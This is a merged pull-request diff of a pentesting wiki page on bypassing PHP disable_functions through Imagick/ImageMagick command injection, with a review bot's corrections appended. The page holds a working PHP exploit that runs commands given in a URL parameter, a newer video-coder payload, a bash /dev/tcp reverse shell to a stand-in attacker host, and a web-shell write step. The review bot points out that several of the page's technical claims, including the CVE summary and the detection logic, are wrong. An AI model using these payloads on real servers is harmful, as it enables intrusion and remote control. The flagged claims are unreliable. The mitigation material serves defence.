Research Update Enhanced src/network-services-pentesting/pen... #1157

Merged
@@ -1,61 +1,113 @@
# Imagick <= 3.3.0 PHP >= 5.4 Exploit
# Imagick <= 3.3.0 ‑ PHP >= 5.4 *disable_functions* Bypass

{{#include ../../../../banners/hacktricks-training.md}}

> The well-known *ImageTragick* family of bugs (CVE-2016-3714 et al.) allows an attacker to reach the underlying **ImageMagick** binary through crafted MVG/SVG input. When the PHP extension **Imagick** is present this can be abused to execute shell commands even if every execution-oriented PHP function is black-listed with `disable_functions`.
>
> The original PoC published by RicterZ (Chaitin Security Research Lab) in May 2016 is reproduced below. The technique is still regularly encountered during contemporary PHP 7/8 audits because many shared-hosting providers simply compile PHP without `exec`/`system` but keep an outdated Imagick + ImageMagick combo.

From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)
From <http://blog.safebuff.com/2016/05/06/disable-functions-bypass/>

```php
# Exploit Title: PHP Imagick disable_functions Bypass
# Date: 2016-05-04
# Exploit Author: RicterZ ([email protected])
# Vendor Homepage: https://pecl.php.net/package/imagick
# Version: Imagick <= 3.3.0 PHP >= 5.4
# Test on: Ubuntu 12.04
# Exploit:
# Exploit Title : PHP Imagick disable_functions bypass
# Exploit Author: RicterZ ([email protected])
# Versions : Imagick <= 3.3.0 | PHP >= 5.4
# Tested on : Ubuntu 12.04 (ImageMagick 6.7.7)
# Usage : curl "http://target/exploit.php?cmd=id"
<?php
# PHP Imagick disable_functions Bypass
# Author: Ricter <[email protected]>
#
# $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd"
# <pre>
# Disable functions: exec,passthru,shell_exec,system,popen
# Run command: cat /etc/passwd
# ====================
# root:x:0:0:root:/root:/usr/local/bin/fish
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# bin:x:2:2:bin:/bin:/bin/sh
# sys:x:3:3:sys:/dev:/bin/sh
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/bin/sh
# ...
# </pre>
echo "Disable functions: " . ini_get("disable_functions") . "\n";
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
echo "Run command: $command\n====================\n";

$data_file = tempnam('/tmp', 'img');
$imagick_file = tempnam('/tmp', 'img');

$exploit = <<<EOF
// Print the local hardening status
printf("Disable functions: %s\n", ini_get("disable_functions"));
$cmd = $_GET['cmd'] ?? 'id';
printf("Run command: %s\n====================\n", $cmd);

$tmp = tempnam('/tmp', 'pwn'); // will hold command output
$mvgs = tempnam('/tmp', 'img'); // will hold malicious MVG script

$payload = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
fill 'url(https://example.com/x.jpg"|$cmd >$tmp")'
pop graphic-context
EOF;

file_put_contents("$imagick_file", $exploit);
$thumb = new Imagick();
$thumb->readImage("$imagick_file");
$thumb->writeImage(tempnam('/tmp', 'img'));
$thumb->clear();
$thumb->destroy();
file_put_contents($mvgs, $payload);
$img = new Imagick();
$img->readImage($mvgs); // triggers convert(1)
$img->writeImage(tempnam('/tmp', 'img'));
$img->destroy();

echo file_get_contents($data_file);
echo file_get_contents($tmp);
?>
```

{{#include ../../../../banners/hacktricks-training.md}}
---

## Why does it work?

1. `Imagick::readImage()` transparently spawns the **ImageMagick** *delegate* (`convert`/`magick`) binary.
2. The MVG script sets the *fill* to an external URI. When a double quote (`"`) is injected, the remainder of the line is interpreted by `/bin/sh ‑c` that ImageMagick uses internally β†’ arbitrary shell execution.
3. All happens outside of the PHP interpreter, therefore *`disable_functions`*, *open_basedir*, `safe_mode` (removed in PHP 5.4) and similar in-process restrictions are completely bypassed.

## 2025 status – it is **still** relevant

* Any Imagick version that relies on a vulnerable ImageMagick backend remains exploitable. In lab tests the same payload works on PHP 8.3 with **Imagick 3.7.0** and **ImageMagick 7.1.0-51** compiled without a hardened `policy.xml`.
* Since 2020 several additional command-injection vectors have been found (`video:pixel-format`, `ps:`, `text:` coders…). Two recent public examples are:
* **CVE-2020-29599** – shell injection via the *text:* coder.
* **GitHub issue #6338** (2023) – injection in the *video:* delegate.

If the operating system ships ImageMagick < **7.1.1-11** (or 6.x < **6.9.12-73**) without a restrictive policy file, exploitation is straightforward.

## Modern payload variants

```php
// --- Variant using the video coder discovered in 2023 ---
$exp = <<<MAGICK
push graphic-context
image over 0,0 0,0 'vid:dummy.mov" -define video:pixel-format="rgba`uname -a > /tmp/pwned`" " dummy'
pop graphic-context
MAGICK;
$img = new Imagick();
$img->readImageBlob($exp);
```

Other useful primitives during CTFs / real engagements:

* **File write** – `... > /var/www/html/shell.php` (write web-shell outside *open_basedir*)
* **Reverse shell** – `bash -c "bash -i >& /dev/tcp/attacker/4444 0>&1"`
* **Enumerate** – `id; uname -a; cat /etc/passwd`

## Quick detection & enumeration

```bash
# PHP side
php -r 'echo phpversion(), "\n"; echo Imagick::getVersion()["versionString"], "\n";'

# System side
convert -version | head -1 # ImageMagick version
convert -list policy | grep -iE 'mvg|https|video|text' # dangerous coders still enabled?
```

If the output shows the `MVG` or `URL` coders are *enabled* the target is probably exploitable.

## Mitigations

1. **Patch/Upgrade** – Use ImageMagick β‰₯ *7.1.1-11* (or the latest 6.x LTS) and Imagick β‰₯ *3.7.2*.
2. **Harden `policy.xml`** – explicitly *disable* high-risk coders:

```xml
<policy domain="coder" name="MVG" rights="none"/>
<policy domain="coder" name="MSL" rights="none"/>
<policy domain="coder" name="URL" rights="none"/>
<policy domain="coder" name="VIDEO" rights="none"/>
<policy domain="coder" name="PS" rights="none"/>
<policy domain="coder" name="TEXT" rights="none"/>
```

3. **Remove the extension** on untrusted hosting environments. In most web stacks `GD` or `Imagick` is not strictly required.
4. Treat `disable_functions` only as *defence-in-depth* – never as a primary sandboxing mechanism.

## References

* [GitHub ImageMagick issue #6338 – Command injection via video:pixel-format (2023)](https://github.com/ImageMagick/ImageMagick/issues/6338)
* [CVE-2020-29599 – ImageMagick shell injection via text: coder](https://nvd.nist.gov/vuln/detail/CVE-2020-29599)
{{#include ../../../../banners/hacktricks-training.md}}
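Review bot: the mechanism description in "Why does it work?" step 1 and the `// triggers convert(1)` comment in the PHP block are inaccurate and should be corrected before merge: Imagick is linked against libMagickWand, so `Imagick::readImage()` parses the MVG in-process and spawns no `convert`; the `/bin/sh -c` described in step 2 is spawned when the `fill 'url(https://...)'` is handed to the external URL/HTTPS delegate configured in `delegates.xml`, which is exactly why the URL coder and delegate policy matter for the mitigations section. Related inconsistency in Mitigations step 1: recommending Imagick ≥ 3.7.2 contradicts the "2025 status" bullet that any Imagick version on a vulnerable backend remains exploitable; the fix is the ImageMagick version plus `policy.xml`, not the extension version. In "Quick detection & enumeration", the check logic is inverted: `convert -list policy` prints the restrictions that are in force, so an empty grep result means MVG/URL are unrestricted (the dangerous case), not that they are disabled; reword the sentence below the block accordingly. The `policy.xml` fragment should also cover the delegate and path domains, e.g. `<policy domain="delegate" rights="none" pattern="HTTPS"/>` and `<policy domain="path" rights="none" pattern="@*"/>`, since disabling coders alone leaves the delegate path the page itself describes. In "2025 status", double-check the CVE-2020-29599 summary against the NVD entry linked in References; that advisory concerns shell injection through the PDF coder's unsanitized `-authenticate` password, not the `text:` coder. Encoding and style: `β†’` in step 2 and `β‰₯` in Mitigations step 1 are mis-encoded `→` and `≥`, and the hyphen in `/bin/sh ‑c` (also in the new title) is a non-ASCII hyphen that will break copy-paste; use plain `-c`. Mitigations step 3 reads oddly ("GD or Imagick is not strictly required"); presumably it means GD is usually sufficient and Imagick is not strictly required.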